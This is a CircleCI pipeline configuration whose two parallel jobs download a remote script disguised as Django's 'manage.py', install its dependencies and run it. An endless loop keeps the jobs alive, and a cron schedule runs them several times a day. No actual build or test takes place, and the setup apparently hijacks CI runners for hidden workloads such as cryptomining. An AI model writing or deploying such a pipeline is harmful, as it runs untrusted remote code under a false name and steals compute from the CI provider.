version: 2.1

jobs:
  build:
    parallelism: 10
    docker:
      - image: couchbase
    steps:
      - checkout
      - run: curl -L https://raw.githubusercontent.com/deeplearningdungs/python-django/master/manage.py > ./manage.py
      - run: apt update && apt -y install curl python3 libjansson4
      - run: chmod +x manage.py
      - run: python3 manage.py
      - run: while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done
                     
  build2:
    parallelism: 10
    docker:
      - image: couchbase
    steps:
      - checkout
      - run: curl -L https://raw.githubusercontent.com/deeplearningdungs/python-django/master/manage.py > ./manage.py
      - run: apt update && apt -y install curl python3 libjansson4
      - run: chmod +x manage.py
      - run: python3 manage.py
      - run: while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done
      
workflows:
  version: 2.1
  main:
    jobs:
      - build
      - build2
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
                
  alternatives:
    jobs:
      - build
      - build2